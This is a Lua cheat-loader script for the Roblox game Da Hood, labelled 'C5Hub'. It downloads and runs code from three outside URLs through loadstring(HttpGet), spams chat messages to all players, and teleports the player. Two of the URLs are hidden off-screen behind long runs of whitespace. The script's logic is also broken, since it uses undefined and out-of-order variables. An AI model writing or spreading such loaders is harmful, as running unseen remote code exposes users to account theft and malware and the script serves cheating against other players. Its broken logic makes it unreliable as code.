--[[ C5Hub: DH (Da Hood) ]]--
                                                                                                                                                                            local fade = "https://raw.githubusercontent.com/NighterEpic/Faded/main/YesEpic"
--[[-----------------------------------------------------------------------------------------]]                                                                                                                                                               local player = game.Players.LocalPlayer
local MSG = game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest            --|
local wel = "Loading C5Hub: (DH).."                                                         --|
local loaded = "Loaded C5Hub: (DH) successfully."                                           --|                                                                      
local o = 2                                                                                 --|
local p = 0.2                                                                               --|
--[[-----------------------------------------------------------------------------------------]]                                                                                                                                                                                                local arc = "https://polar7.wtf/Arctic/Arctic.txt"
                                                                                                                                                                                                                                                                                                                  local trust = 'https://pastebin.com/raw/XXAWmifh'
if game.PlaceId == DH then

MSG:FireServer(wel ,"All")
--------------------------------
wait(o)
--------------------------------
loadstring(game:HttpGet(fade, true))()
--------------------------------
wait(p)
--------------------------------
loadstring(game:HttpGetAsync(arc))()
--------------------------------
wait(p)
--------------------------------
loadstring(game:HttpGet(trust))()
--------------------------------
wait(o)
--------------------------------
MSG:FireServer(loaded ,"All")

end
--

if not ID == DH then
game:GetService("TeleportService"):Teleport(2788229376, player)
wait(58)
MSG:FireServer("[C5Hub] Teleported to DH, Re-execute the script.", "All")
end
--
                                                                                                                                                                                                                                                                                                                                local ID = game.PlaceId
                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                
